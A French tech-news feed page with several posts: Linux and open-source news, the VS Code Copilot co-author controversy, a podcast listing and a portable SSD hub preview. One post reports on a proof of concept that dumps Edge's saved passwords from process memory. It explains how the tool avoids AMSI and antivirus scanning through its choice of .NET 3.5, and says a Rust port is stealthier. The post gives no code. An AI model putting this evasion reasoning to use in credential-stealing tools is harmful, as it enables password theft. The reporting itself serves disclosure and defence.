Vue normale

Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
Aujourd’hui — 7 mai 2026Flux principal

CKOIKIDI 101 : Résumé du live Actus du libre avril 2026

7 mai 2026 à 11:19
Salut à toutes et à tous,

On se retrouve pour le débriefing complet de ce CKOIKIDI #101 du 6 mai 2026, vu que vous aimez ce petit compte rendu.

J'ai préparé ma veille moi-même car, pour l'anecdote, Gemini a complètement déliré en me racontant n'importe quoi sur les versions logicielles. Voici les actus qu'on a abordées qui ont attirés mon attention.

1. Ubuntu 26.04 LTS "Resolute Raccoon"
La grosse nouvelle de ce mois d'avril est la sortie, le 23 avril, de la version 26.04 LTS, baptisée Resolute Raccoon.
C'est une version à long terme supportée pendant 5 ans, mais vous pouvez monter jusqu'à 12 ans de support avec Ubuntu Pro, qui est gratuit pour les particuliers, jusqu'à 5 machines.
On y retrouve Gnome 50, ce qui signifie qu'on passe en 100 % Wayland par défaut, sans session X11 possible. Le système embarque le noyau Linux 7.0 et, pour la sécurité, propose le chiffrement complet du disque via la puce TPM, rendant le déverrouillage transparent au boot comme Windows 11.
Autre changement profond : les outils de base (ls, cd, sudo) sont désormais écrits en Rust ! (Pour ceux qui viennent de la précédente LTS, on a toutes les évolutions des versions intermédiaires.
Je continue de conseiller Ubuntu aux débutants car elle gère parfaitement le Secure Boot, les pilotes Nvidia signés et les codecs dès l'installation. Concernant les Snaps, j'arrête de râler car ils ont fait des progrès fulgurants : même sur une machine avec seulement 4 Go de RAM, Firefox se lance désormais sans aucune lenteur ! Ils ont l'avantage de présenter des mises à jour pour les applis graphiques (LibreOffice) ce qui permet de garder une base stable du système avec des logiciels qui évoluent.

2. Fedora Linux 44
On enchaîne avec Fedora 44, sortie le 28 avril, qui propose une expérience Gnome 50 très pure, sans les extensions ajoutées par Ubuntu. L'édition KDE Plasma 6.6 est particulièrement soignée avec l'arrivée du Plasma Login Manager (PLM) qui remplace l'historique SDDM pour une meilleure intégration Wayland sans oublier l'assistant de premier démarrage. Pour les gamers, le module noyau NTSync est activé par défaut, ce qui booste les performances des jeux Windows lancés via Steam ou Wine. Fedora reste fidèle à sa réputation de vitrine technologique, bien que livrée avec le noyau 6.19, le 7.0 arrivera d'ici quelques jours dans les dépôts
Vous le savez, je suis contributeur du projet et j'utilise cette version 44 sur ma propre machine depuis février. Un bémol cependant : Fedora consomme souvent deux fois plus de RAM qu'Ubuntu sur une installation fraîche, et je continue de forcer le système en EXT4 car je trouve le BTRFS par défaut encore un peu lent sur les SSD surtout d'entrée de gamme !

3. Linux Mint : Ralentissement du développement
Les nouvelles du blog officiel de Linux Mint nous apprennent que le développement ralentit pour se concentrer sur des chantiers de fond très lourds. La prochaine version majeure, Mint 23, n'arrivera qu'à Noël 2026, car l'équipe doit unifier l'installeur "Live Installer" avec celui de la version Debian. Ils travaillent aussi d'arrache-pied sur le support de Wayland pour Cinnamon, mais ce ne sera probablement pas stable avant la version 24 en 2028. En attendant, ils proposent des images ISO HWE (Hardware Enablement) pour permettre l'installation sur du matériel récent avec des noyaux plus frais comme le 6.17
Vous le savez, j'ai un énorme coup de cœur pour la version LMDE (Linux Mint Debian Edition) car les mises à jour de Cinnamon y arrivent en continu, un peu comme une rolling release, ce qui est à l'étude pour la Linux Mint classique avec la suggestion de mettre les mises à jour au fil de l'eau des outils et de l'environnement de bureau, au lieu de faire des versions intermédiaires (comme la 22.1 22.2 22.3 etc.). Je pense d'ailleurs que les changements imposés par Ubuntu (comme le passage à Rust pour les utilitaires de base) agacent tellement l'équipe de Mint qu'ils finiront par abandonner la base Ubuntu pour ne garder que Debian.
.
4. Alma Linux 9.8 et migration vers la version 10 x86_64_v2
La version 9.8 Beta d'Alma Linux est sortie, apportant Python 3.14 et des mises à jour pour MariaDB 10.8 et PostgreSQL 18 en tant que module. L'info importante aussi est la mise à jour de l'outil Elevate, qui permet désormais de migrer d'Alma 9 vers la version 10 tout en restant sur l'architecture x86_64_v2. C'est une décision majeure car Red Hat Enterprise Linux 10 impose l'architecture v3, ce qui peut rendre obsolètes des serveurs plus anciens. Alma Linux a même recompilé une partie du dépôt EPEL pour garantir la compatibilité avec ces processeurs v2.
En tant que contributeur, je salue cette démarche exemplaire contre l'obsolescence programmée des serveurs. Offrir un support jusqu'en 2035 sur du matériel ancien, c'est la preuve qu'Alma Linux est la distribution la plus pragmatique pour les entreprises aujourd'hui, tout en ayant un support de 10 ans.

5. Ubuntu et sa stratégie sur l'IA
Canonical a profité du lancement de la 26.04 pour clarifier sa position sur l'intelligence artificielle ! Leur stratégie repose sur une approche mesurée, privilégiant des modèles ouverts et des outils open source plutôt que des API fermées. Ils distinguent les fonctions "implicites" (comme la synthèse vocale sous le capot) des fonctions "explicites" centrées sur l'utilisateur. Le point important à retenir est que l'inférence se fera localement sur la machine, garantissant la confidentialité des données.
Je suis quand même en partie rassuré de voir qu'ils ne cèdent pas à la mode de la "cloudification" totale de l'IA. J'apprécie aussi que dans l'annonce Canonical évalue ses ingénieurs sur la qualité de leur code et non sur la quantité d'IA qu'ils ont utilisée pour le produire. Donc on peut espérer que l'IA sera utilisée un outil, comme l'a été le moteur de recherche il y a 20 ans !

6. Microsoft libère le code de 86-DOS 1.0 !
Pour le 45e anniversaire de 86-DOS 1.0, Microsoft a publié le code source original sous licence MIT sur GitHub https://github.com/DOS-History/Paterson-Listings .Ce corpus inclut les sources du noyau, les instantanés de développement de PC DOS 1.0 et des utilitaires comme CHKDSK. C'est un véritable travail d'archéologie numérique qui a été mené par des historiens pour scanner et retranscrire ces listings en assembleur. Cette démarche fait suite à l'ouverture de MS-DOS 4.0 et du Basic 6502 l'année dernière.
Même si je ne suis pas développeur assembleur, je trouve que c'est un geste formidable pour la préservation de l'histoire de l'informatique. C'est une plongée fascinante dans le passé qui montre que même les géants comme Microsoft commencent à jouer le jeu de l'ouverture pour le patrimoine numérique !

7. Kdenlive 26.04
Première version de 2026 de Kdenlive est arrivé avec un nombre record de nouveaux contributeurs ! Parmi les nouveautés, on trouve la duplication de la sortie moniteur vers un écran secondaire externe, très pratique pour le montage collaboratif. Les transitions bénéficient maintenant d'une prévisualisation animée dans la liste des effets avant même de les appliquer. Les boîtes de réglages acceptent désormais les expressions mathématiques (on peut taper "1920/2" au lieu de calculer soi-même). Enfin, l'accélération ou le ralentissement de plusieurs clips simultanément est désormais possible !
C'est mon outil de montage vidéo quasi quotidien, toutes mes vidéos YouTube sont montées avec Kdenlive depuis des années. Même si l'interface peut sembler intimidante au début, c'est pour moi le meilleur logiciel de montage libre, et je continue de l'utiliser en anglais pour mieux suivre les tutos sur le net !

8. Firefox 150 : Des nouveautés en pagaille
Firefox 150 améliore la fonctionnalité SplitView, permettant de mettre deux onglets côte à côte dans la même fenêtre. On peut désormais partager plusieurs URL simultanément et l'éditeur de PDF intégré permet de réorganiser les pages. Mozilla lance également son propre dépôt RPM officiel pour faciliter l'installation sur Fedora, RHEL ou Mageia qui pour cette dernière utilise par défaut la version ESR. Le VPN gratuit (limité à 50 Go) est désormais étendu aux utilisateurs canadiens, après la France et l'Allemagne notamment.
L'arrivée du dépôt RPM est une décision stratégique géniale, surtout pour RHEL 10 qui ne propose plus Firefox par défaut. Concernant le SplitView, Firefox rattrape son retard sur Vivaldi, même si je reste sur Vivaldi pour ma part car il permet de juxtaposer jusqu'à quatre onglets, ce qui est indispensable pour gérer mes différents chats en live par exemple !

9. Scaleway remporte l’hébergement des données de santé
Après sept ans de polémiques, le Health Data Hub (renommé PDS pour Plateforme des données de santé) quitte Microsoft Azure pour l'hébergeur français Scaleway. Ce choix fait suite à un appel d'offres rigoureux de l'UGAP, impliquant la Dinum et le ministère de la Santé avec plus de 350 critères techniques. C'est une étape importante pour sortir ces données sensibles de la juridiction du Cloud Act américain.
On prouve enfin qu'on peut confier nos données les plus précieuses à des acteurs locaux comme la société de Xavier Niel. A titre perso, j'avais trouvé leurs tarifs un peu chers (par rapport à IONOS qui héberge aussi en France le site Linuxtricks), je ne sais pas ce qu'il en est pour l'offre des données de santé, vis à vis de Microsoft, mais la souveraineté à un côut, et c'est une bonne chose que ça reste en France.

10. La FRANCE fournira un cloud souverain à l'UE
Un consortium français composé d'OVHcloud, Clever Cloud et Luxembourgeois pour Deep a remporté un marché de 180 millions d'euros pour fournir des services cloud à l'Union Européenne. OVH gère la capacité de déploiement, Clever Cloud apporte les outils d'architecture hybride et Deep s'occupe de la cybersécurité. L'objectif de la Commission Européenne est de renforcer sa résilience en évitant la dépendance aux acteurs uniques américains. C'est une étape symbolique forte puisque 80 % du marché numérique européen est actuellement capté par les États-Unis
On arrête de dire que la France est nulle en informatique ; on est sur le devant de la scène avec des solutions robustes et crédibles face aux GAFAM !

11. Faille de sécu Linux copy.fail (CVE-2026-31431)
Une vulnérabilité critique nommée Copy.fail a été découverte, permettant à n'importe quel utilisateur local de devenir root instantanément. Cette faille, présente dans le noyau depuis 2017, a touché des millions de serveurs avant d'être corrigée en urgence début mai. J'ai publié une vidéo et surtout un long article technique détaillé car je n'ai trouvé aucun contenu sérieux en français sur le sujet. https://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/
J'ai passé mon dimanche à étudier cette faille au lieu de faire ma déclaration d'impôts, mais ça en valait la peine tant le sujet est passionnant !

Merci à toutes et à tous d'avoir suivi ce 101e épisode !
On se retrouve le 3 juin pour le prochain live actu.

L’histoire et la fin de YggTorrent 📥

Par : Mr Xhark
7 mai 2026 à 08:00

J'ai vu passer un certain nombre de vidéos abordant la fermeture de YggTorrent et celle que vous conseille, c'est celle de Sylvqin.

Il a réussi à obtenir des ITW des personnes qui gravitaient autour du site mais également de celui qui a fait tomber le site grâce au hash d'une favicon :

GG Sylvqin 👏

 

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 07/05/2026 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article L’histoire et la fin de YggTorrent 📥 provient de : on Blogmotion.
Hier — 6 mai 2026Flux principal

VS Code signe vos commits avec Copilot, même sans Copilot

Par : Korben ✨
6 mai 2026 à 12:16

Si vous avez committé du code depuis VS Code depuis mi-avril, allez tout de suite vérifier vos messages de commit car vous avez peut-être un nouveau co-auteur que vous n'avez jamais embauché.

En effet, Microsoft a discrètement basculé le réglage par défaut de l'éditeur pour ajouter Co-authored-by: Copilot <[email protected]> à des commits que VS Code considérait à tort comme contenant des contributions IA, même quand vous n'avez pas utilisé Copilot, et même quand vous avez explicitement désactivé toutes les fonctions IA.

Quelle lose, hein ? La Product Manager Courtney Webster a poussé cette fameuse pull request #310226 des enfers le 15 avril dernier sans aucune description, et le dev dmitrivMS l'a mergée tranquillou le lendemain.

Et le résultat de tout ce bordel, vous pouvez le lire dans la PR #310226 qui a explosé sur GitHub : 372 pouces baissés contre 2 levés, 30 réactions "confused", et des dizaines de commentaires furieux.

L' issue de suivi #314311 , ouverte ensuite par dmitrivMS pour faire son point public, a elle aussi reçu un torrent de réactions virulentes. Tu m'étonnes, ils font vraiment n'importe quoi...

Maintenant si vous êtes dans ce cas, vous pouvez neutraliser ça immédiatement, ajoutez dans votre settings.json :

"git.addAICoAuthor": "off"

C'est le seul réglage qui marche vraiment, parce que dans la version buguée même chat.disableAIFeatures à true n'arrêtait pas le soucis. Et pour votre historique déjà bien pollué, un git rebase -i ou un git filter-branch permettra de virer les contributeurs parasites dans vos derniers commits. Mais après bonne chance si vos commits sont déjà sur des PR mergées chez d'autres. Là c'est mort...

Ce que les devs reprochent à Microsoft, c'est pas vraiment d'avoir créé l'option (elle existait depuis VS Code 1.110 en opt-in tranquille). Non, le vrai problème c'est surtout ce qu'il y a derrière cette vilaine Pull Request... 2 fichiers touchés, le change de "default", absolument AUCUNE description, une seule review d'approbation toute nulle, et hop, c'est mergé OKLM.

Pour un changement qui touche les messages de commit de plusieurs millions de devs, ça sent quand même la décision unilatérale prise à l'arrache entre 2 portes...

Et puis surtout il y a le bug #313064 qui a fait basculer l'histoire de la simple polémique à la grosse colère communautaire.

En effet, la nouvelle valeur par défaut "all" attribuait à Copilot des complétions qui ne venaient PAS de Copilot. Un dev explique par exemple avoir tapé son code à la main, vérifié son message de commit, supprimé toute suggestion Copilot, écrit le sien à la main... et a finalement retrouvé quand même Co-authored-by: Copilot dans le git log final.

Et comme le mode "je ne veux pas d'IA" n'était pas plus respecté, l'IA s'auto-créditait quand même sur tout et n'importe quoi.

Côté communauté, le ton est monté très vite. Sur le fil GitHub, y'en a un qui écrit que, je cite, "C'est pas une régression, c'est de la fraude. On ne peut pas s'attribuer un travail qu'on n'a pas fait." et un autre dev parle de "vandalisme" pur.

Windows Central a même sorti un titre choc : "This could cost people their jobs", parce que dans les boites en fintech ou sur du code soumis à audit, faire passer du code humain pour de l'IA-assisté peut coller un fail d'audit et faire péter des contrats. Ah bah ouais, j'avoue que je n'y avais pas pensé...

Heureusement, Microsoft a fini par bouger puisque dans VS Code 1.118 , le default est finalement repassé de "all" à "chatAndAgent", déjà moins agressif. Et dans la PR #313931 , dmitrivMS a remis le default à "off" pour la version 1.119, dont le déploiement public commence justement aujourd'hui.

Bien sûr, la Product Manager a fait son mea culpa public, en reconnaissant, je cite que "la manière dont c'était implémenté et déployé n'a pas atteint le niveau de correction attendu", ce qui, dans la langue corporate, veut dire "on est des branleurs, déso, bisous".

Maintenant ce qui revient souvent dans les commentaires, c'est que Claude Code et Codex CLI font la même chose par défaut quand ils committent, sauf que la différence, c'est que ces agents committent quand C'EST EUX qui ont écrit le code, donc le co-author est tout a fait légitime.

VS Code, lui, modifiait des commits écrits à la main par des humains donc c'est pas du tout le même problème. Et pour le coup, sur Codex CLI la mention reste aussi désactivable via une option alors que chez Claude Code même si c'est pareil, l'opt-out n'est pas toujours très respecté d'après les retours que j'ai pu lire.

En tout cas, ce loupé arrive dans un climat déjà tendu puisque Microsoft pousse Copilot dans Windows, dans Notepad, dans Office, et même jusque dans l'écosystème Apple via une extension Xcode , dans tous les coins, et beaucoup de devs commencent à voir chaque nouveauté MS à travers ce prisme. La théorie du "ils gonflent les KPI Copilot pour les boards et les analystes" de plus en plus crédible et comme personne n'aime se sentir transformé en stat marketing, tout le monde commence à se barrer des outils et services Microsoft.

Maintenant, si vous voulez vraiment vous protéger des prochains coups foireux de M$, je vous propose d'abord de basculer sur VSCodium ou Zed , deux éditeurs sans télémétrie ni AI imposée. Et ensuite, déménager vos repos chez Codeberg ou Forgejo en suivant la procédure de migration que je vous donne dans cet article Patreon, comme ça même si Microsoft fait n'importe quoi côté éditeur, votre code n'est plus chez eux côté forge.

À voir maintenant si Microsoft tient ses promesses sur le consentement explicite avant toute mention d'agent IA, ou si on rejouera ce film encore et encore tous les 6 mois sur une autre fonctionnalité.

À partir d’avant-hierFlux principal

Nouveau service Uber « Rent a Human » – RDV Tech

Par : NotPatrick
5 mai 2026 à 16:00

Au programme :

Et si David rachetait Goliath?

Uber veut devenir votre concierge de luxe

T1 2026: Où en sont les GAFAM

Le reste de l’actualité


Infos :

Animé par Patrick Beja (BlueskyInstagramTwitterTikTok).

Co-animé par Cédric de Luca (Bluesky).

Produit par Patrick Beja (LinkedIn) et Fanny Cohen Moreau (LinkedIn).

Musique libre de droit par Daniel Beja


Le Rendez-vous Tech épisode 664 – Nouveau service Uber « Rent a Human » – Gamestop & eBay, Uber Go-Get, résultats GAFAM, Jensen Huang, OpenAI & Urgences, Talkie LLM 1930


---

Liens :


🎧 L’Actu Tech (podcast daily): NotPatrick.com/#lactutech

😎 Soutien sur Patreon : Patreon.com/RDVTech

🤗 Communauté Discord : NotPatrick.com/discord


Par écrit :

📰 Newsletter : NotPatrick.com/newsletter

📰 Archives NL: NotPatrick.com/archivenl

📢 WhatsApp : NotPatrick.com/whatsapp

🐤 Veille Twitter : Twitter.com/RdvTech


En vidéo :

📹 Live : Twitch.tv/NotPatrick

📺 VOD : YouTube.com/NotPatrickPodcasts

📱 TikTok : Tiktok.com/@NotNotPatrick


💁 Tous les liens : NotPatrick.com


Hébergé par Acast. Visitez acast.com/privacy pour plus d'informations.

💾

© NotPatrick

On résume chaque semaine tout le monde de la tech. Un podcast pour tous, compréhensible, intéressant et fun !

Edge - Les mots de passe en clair en mémoire, by design

Par : Korben ✨
5 mai 2026 à 09:06

Si vous utilisez le gestionnaire de mots de passe intégré à Microsoft Edge, et que vous le trouvez cool, hé bien accrochez-vous les amis, car Tom Jøran Sønstebyseter Rønning, chercheur norvégien en cybersécurité, vient de publier sur GitHub un PoC qui dump TOUS vos credentials en clair directement depuis la mémoire du processus du navigateur ! Et de ce que j'ai compris, Microsoft a l'air d'assumer ça tranquillou...

Et n'allez pas croire qu'activer "l'Authentification avant remplissage automatique" dans Edge règle le souci... Ça ne change absolument RIEN au problème, parce que les credentials sont chargés en clair en RAM dès l'ouverture du navigateur. Cette option bloque uniquement l'interface, et pas la mémoire. La seule vraie parade, c'est donc de basculer carrément vers un gestionnaire de mots de passe comme Bitwarden, KeePassXC, ou Mistikee car tant qu'ils restent verrouillés, ils ne chargent rien en mémoire.

Le PoC, baptisé EdgeSavedPasswordsDumper, tient en un seul fichier C#. Tom a choisi .NET Framework 3.5 plutôt qu'une version récente, parce que AMSI, l'Antimalware Scan Interface qui inspecte en temps réel le code .NET sous Windows, a une couverture vraiment réduite sur la 3.5 par rapport aux versions modernes. Du coup, le binaire passe plus facilement sous les radars des EDR et antivirus.

Maintenant, le truc, c'est que ce sujet n'est pas nouveau. En effet, en juin 2022, Zeev Ben Porat de chez CyberArk publiait déjà un papier détaillant exactement la même méthode appliquée à Chromium en général (et dont Edge découle...). Il utilisait les APIs Windows OpenProcess et ReadProcessMemory pour lire la mémoire privée des processus du navigateur et y récupérer URLs, logins, mots de passe et même cookies de session. Et à l'époque, Microsoft et Google avaient répondu en gros pareil, à savoir que c'était hors du "threat model", donc que c'était pas la peine de corriger.

Sauf que 4 ans plus tard, Tom Rønning n'arrivait pas à reproduire le dump sur Chrome avec la même méthode. En effet, le navigateur de Google semble charger ses credentials de façon plus granulaire (lazy loading, déchiffrement au besoin) plutôt que tout exposer en RAM dès l'ouverture. Alors que Edge, lui, n'a pas évolué et charge encore TOUS les credentials en clair dès le démarrage du navigateur, qu'on en ait besoin ou pas, et surtout les garde en mémoire tant que le processus parent tourne. Et c'est cette différence-là que Tom met en lumière avec son outil.

Après concernant la dangerosité de ce problème, faut que je nuance un peu tout ça car pour viser sa propre session Edge, l'attaquant n'a pas besoin d'être admin (un malware tournant sous votre compte y arrivera). Par contre, pour aller lire la mémoire des AUTRES utilisateurs sur la même machine, là, il faut les droits administrateur.

Et c'est surtout ce scénario que Tom met en avant dans son README. Il y parle d'un terminal server où plusieurs utilisateurs seraient connectés simultanément via RDP, et sur lequel un admin compromis pourrait dumper les mots de passe de tous les autres avec leur Edge ouvert, y compris les sessions déconnectées tant que le processus parent tourne. C'est assez spécifique quand même mais pas impossible évidemment...

Microsoft, contacté par Tom avant publication, a bien sûr répondu que le comportement était "by design"... Leur doc Edge enterprise explique même noir sur blanc que les attaques physiquement locales et les malwares sont hors du modèle de menace et qu'aucun navigateur n'est armé pour résister à un attaquant déjà infiltré dans le compte utilisateur.

C'est cohérent c'est vrai... Mais ça occulte un truc qui reste très "gênant" comme disent les ados. C'est que leur implémentation expose une surface d'attaque plus large que leurs concurrents basés sur le MÊME moteur Chromium. C'est pas normal....

Et côté communauté, ça n'a pas trainé non plus, puisque Whitecat18 sur GitHub a déjà sorti un portage Rust du PoC. C'est intéressant car Rust offre encore moins de surface AMSI que .NET 3.5 et se compile comme un binaire natif sans aucune dépendance. Donc pour un attaquant, c'est un upgrade de furtivité significatif... Et pour un défenseur, c'est surtout une raison de plus de pousser vos utilisateurs vers des vrais gestionnaires de mots de passe.

Concernant la divulgation responsable , Tom Rønning a fait les choses dans les règles : signalement à Microsoft, attente de la réponse officielle, présentation publique le 29 avril 2026 à BigBiteOfTech (l'évènement Palo Alto Networks Norway), puis publication du PoC.

Voilà... Microsoft persiste, Edge reste as-is (lumière !), et la sécurité de vos mots de passe est officiellement votre problème. Donc si vous utilisez Edge, je pense que ça vaut clairement le coup de migrer vers un gestionnaire externe... vous verrez, c'est pas la mer à boire.

Source

Sharge Disk Pro 2 Revealed

Par : Rob Andrews
4 mai 2026 à 18:00

Sharge Go Back to the Drawing Board, with the Disk Pro 2

The Sharge Disk Pro 2 is an upcoming portable storage and connectivity device that combines the functionality of a USB hub with external SSD support in a compact, credit card-sized form factor. Developed by Sharge, the device is designed to address the increasing demand for high-speed data access, external storage expansion, and multi-port connectivity across mobile and desktop platforms. Unlike conventional USB-C hubs or portable SSDs, the Disk Pro 2 merges both roles into a single unit, while also incorporating active cooling to maintain consistent performance under sustained workloads. At launch, it will be available in two variants, Lite and Ultra, which differ in display capability and power efficiency, introducing a tiered approach not seen in the previous model.

Positioned as a follow-up to the earlier Sharge Disk Pro, this new iteration shifts away from fixed internal storage and instead introduces support for user-installed SSDs in multiple M.2 form factors. Alongside this change, the device retains key characteristics such as 10Gbps data throughput, integrated power delivery, and video output capabilities, while adding refinements including magnetic attachment and a lanyard-style data cable. The Lite version features HDMI 2.0 and a higher power draw of around 4W, while the Ultra version includes HDMI 2.1 and operates at approximately 1W, providing a more efficient option with expanded display support. The Disk Pro 2 is scheduled to launch via Kickstarter, continuing the company’s established approach of introducing new hardware through crowdfunding platforms.

Sharge Disk Pro 2 – Design & Storage

The Sharge Disk Pro 2 maintains a compact footprint, measuring approximately 90 × 61 × 11 mm, aligning closely with the dimensions of a standard credit card. This size places it firmly in the category of ultra-portable accessories, designed to be carried alongside a smartphone or laptop without requiring additional space typically associated with external drives or docking stations. The chassis follows a flat, rectangular layout with integrated components distributed to maximize internal efficiency while preserving a slim profile. A defining aspect of the design is its transparent enclosure, which exposes internal components in a style often associated with “cyberpunk” aesthetics. This approach is not purely cosmetic, as it also highlights the inclusion of active cooling hardware within a device of this size. The visible fan and internal layout reinforce the product’s positioning as a performance-oriented device rather than a passive accessory, distinguishing it from more conventional sealed USB hubs. The external design remains consistent across both Lite and Ultra variants, with no physical differentiation beyond internal configuration.

The Disk Pro 2 introduces a magnetic mounting system intended for direct attachment to compatible devices. This includes native support for MagSafe-enabled smartphones, as well as the option to use included magnetic rings for broader compatibility with non-MagSafe hardware. The goal is to reduce cable strain and improve portability by allowing the hub and connected device to function as a single unit during use, particularly in mobile workflows such as handheld video capture or on-the-go file transfers. Another physical design element is the inclusion of a detachable lanyard-style cable that supports both data and power delivery. This integrated approach removes the need for users to carry separate cables for connectivity, while also doubling as a carrying mechanism. The included cable is specified as a 24-pin pure copper design, supporting up to 10Gbps data transfer, power delivery, and DisplayPort signal passthrough.

In terms of storage, the Disk Pro 2 departs from the fixed-capacity approach of the earlier Sharge Disk Pro. Instead of pre-installed flash memory, it supports user-installed M.2 SSDs in 2230, 2242, and 2280 form factors, with a maximum supported capacity of up to 8TB. This change introduces flexibility in both capacity selection and potential future upgrades, allowing users to tailor storage based on their requirements rather than being limited to predefined configurations. The choice between Lite and Ultra models does not affect storage compatibility, with both versions offering the same SSD support and expansion capabilities.

Sharge Disk Pro 2 – Internal Hardware

At the core of the Sharge Disk Pro 2 is a multi-controller architecture described as an independent 4-chip control system. Each major function, including storage access, USB expansion, video output, and power delivery, is handled by a dedicated controller. This separation is intended to improve stability and reduce bandwidth contention when multiple ports are in use simultaneously, particularly under sustained workloads such as file transfers while outputting video and supplying power. A central feature of the internal design is the active cooling system, referred to as the “Ice-storm” fan. Operating at speeds of up to 10,000 RPM, the fan is designed to maintain consistent thermal conditions during extended data transfers. The system includes three operational modes: OFF, Auto, and Turbo. In Auto mode, fan speed adjusts based on internal temperatures, while Turbo maintains maximum cooling performance. This approach addresses a common limitation in compact hubs and SSD enclosures, where passive cooling can lead to thermal throttling under load. The cooling system is consistent across both Lite and Ultra variants, with no differentiation in thermal hardware between the two models.

The storage interface supports M.2 NVMe SSDs across multiple physical formats, with a maximum capacity of up to 8TB. Data transfer is handled over a 10Gbps USB interface, setting an upper limit on throughput but aligning with typical USB 3.2 Gen 2 performance expectations. The combination of active cooling and dedicated controllers is intended to sustain transfer speeds closer to this ceiling over longer periods, rather than allowing performance to degrade as temperatures increase. Differences between the Lite and Ultra versions are not related to storage or controller design, but instead focus on power efficiency and display output, meaning internal data handling performance should remain consistent regardless of variant selection.

Sharge Disk Pro 2 – Ports & Connections

The Sharge Disk Pro 2 integrates a total of 6 ports, combining data transfer, display output, and power delivery within a single device. These include 2 USB-C ports, 1 USB-A port, 1 HDMI output, and dual card reader slots for SD and microSD media. This configuration positions the device as a compact alternative to larger desktop docking stations, while maintaining compatibility with a wide range of peripherals and storage formats. The primary USB-C interface (USB-C1) supports 10Gbps data transfer alongside up to 100W power input, allowing the connected host device to be charged while the hub is in use. A secondary USB-C port (USB-C2) provides up to 80W power output, enabling downstream charging for connected devices. The inclusion of both input and output power delivery allows the hub to function as an intermediary between a power source and multiple connected devices without interrupting data throughput. This overall port layout remains consistent across both Lite and Ultra variants.

Video output capabilities differ between the two versions. The Ultra model includes HDMI 2.1, supporting resolutions up to 4K at 144Hz or 8K at 30Hz, depending on the host system and display compatibility. In contrast, the Lite version is equipped with HDMI 2.0, which reduces maximum output capabilities accordingly. Outside of this distinction, additional connectivity is provided through a USB-A 3.0 port operating at up to 5Gbps, alongside SD and microSD card slots with rated read speeds up to 180MB/s and write speeds up to 120MB/s. The included lanyard cable also functions as a full-featured USB-C connection, supporting 10Gbps data transfer, up to 100W power input, and DisplayPort signal transmission, reducing reliance on separate cables during use.

Sharge Disk Pro vs Sharge Disk Pro 2

The transition from the original Sharge Disk Pro to the Sharge Disk Pro 2 represents a shift in both hardware architecture and product segmentation. The Disk Pro is fundamentally an all-in-one device, combining fixed internal NVMe storage with a compact multi-port hub and active cooling, positioned as a self-contained solution for users who want storage and connectivity without additional components. It integrates storage capacities up to 4TB and was originally sold in tiered pricing depending on capacity . In contrast, the Disk Pro 2 removes onboard storage entirely and instead supports user-installed M.2 SSDs up to 8TB, changing the device into a modular enclosure and hub hybrid rather than a pre-configured storage product. This also alters the pricing structure significantly, as the Disk Pro 2 is sold as a standalone unit starting at $49 for the Lite version and $69 for the Ultra version, separating the cost of storage from the hardware itself.

Beyond storage, the Disk Pro 2 introduces clearer product tiering with Lite and Ultra variants, something not present in the original model. The Lite version reduces cost by using HDMI 2.0 and operating at a higher power draw of around 4W, while the Ultra version includes HDMI 2.1 and lowers power consumption to approximately 1W. Both retain the same core concept of combining data transfer, display output, and power delivery into a compact device, but the newer model expands connectivity with additional ports, including SD and microSD slots. Both generations maintain active cooling as a central feature, designed to prevent thermal throttling during sustained transfers, a capability that has been demonstrated in testing of the original device where performance remained stable under load . Physically, both devices share a similar credit card-sized footprint and transparent design, but the Disk Pro 2 refines usability with a detachable lanyard cable and broader magnetic compatibility. Overall, the original model prioritizes simplicity and integration, while the newer version emphasizes flexibility, lower entry cost, and configurable storage.

Attribute
Sharge Disk Pro
Sharge Disk Pro 2
Storage Type Built-in NVMe SSD User-installed M.2 NVMe SSD
Max Capacity Up to 4TB Up to 8TB
Upgradeable Storage No Yes (2230/2242/2280)
Interface USB 3.2 Gen2 (10Gbps) USB 3.2 Gen2 (10Gbps)
Cooling System Active cooling fan Active cooling fan
Ports 5-in-1 hub 6 ports (adds SD + microSD)
HDMI Version HDMI 2.1 HDMI 2.0 (Lite) / 2.1 (Ultra)
Power Consumption ~4W (Lite) / ~1W (Ultra)
Power Delivery Up to 100W input / 80W output Up to 100W input / 80W output
Cable Design Integrated USB-C cable Detachable lanyard USB-C cable
Magnetic Mounting Yes Yes (expanded compatibility)
Launch Pricing From ~$189 with storage $49 (Lite) / $69 (Ultra)
Product Approach All-in-one storage + hub Modular hub + enclosure

 

Sharge Disk Pro 2 – Launch Date and Price?

The Sharge Disk Pro 2 is scheduled to launch via a crowdfunding campaign on Kickstarter, with the campaign planned to go live on June 9. As with previous releases from Sharge, this approach places the product in an early-access phase prior to wider retail availability, meaning final specifications and delivery timelines may still be subject to change. The device will be offered in two distinct variants, allowing users to choose between different feature sets and efficiency profiles at launch. The entry-level Lite version is priced at $49 and features HDMI 2.0 output with a higher reported power consumption of around 4W. The higher-tier Ultra version is priced at $69 and includes HDMI 2.1 support, alongside a lower power draw of approximately 1W. Both versions are expected to ship with a 24-pin pure copper lanyard-style cable that supports data transfer, charging, and DisplayPort signal transmission. This tiered pricing structure introduces a lower entry point compared to earlier expectations, while still separating features such as display capability and power efficiency between the two models.

 

📧 SUBSCRIBE TO OUR NEWSLETTER 🔔
[contact-form-7]
🔒 Join Inner Circle

Get an alert every time something gets added to this specific article!


Want to follow specific category? 📧 Subscribe

This description contains links to Amazon. These links will take you to some of the products mentioned in today's content. As an Amazon Associate, I earn from qualifying purchases. Visit the NASCompares Deal Finder to find the best place to buy this device in your region, based on Service, Support and Reputation - Just Search for your NAS Drive in the Box Below

Need Advice on Data Storage from an Expert?

Finally, for free advice about your setup, just leave a message in the comments below here at NASCompares.com and we will get back to you. Need Help? Where possible (and where appropriate) please provide as much information about your requirements, as then I can arrange the best answer and solution to your needs. Do not worry about your e-mail address being required, it will NOT be used in a mailing list and will NOT be used in any way other than to respond to your enquiry. [contact-form-7] TRY CHAT Terms and Conditions
If you like this service, please consider supporting us. We use affiliate links on the blog allowing NAScompares information and advice service to be free of charge to you.Anything you purchase on the day you click on our links will generate a small commission which isused to run the website. Here is a link for Amazon and B&H.You can also get me a ☕ Ko-fi or old school Paypal. Thanks!To find out more about how to support this advice service check HEREIf you need to fix or configure a NAS, check Fiver Have you thought about helping others with your knowledge? Find Instructions Here  
 
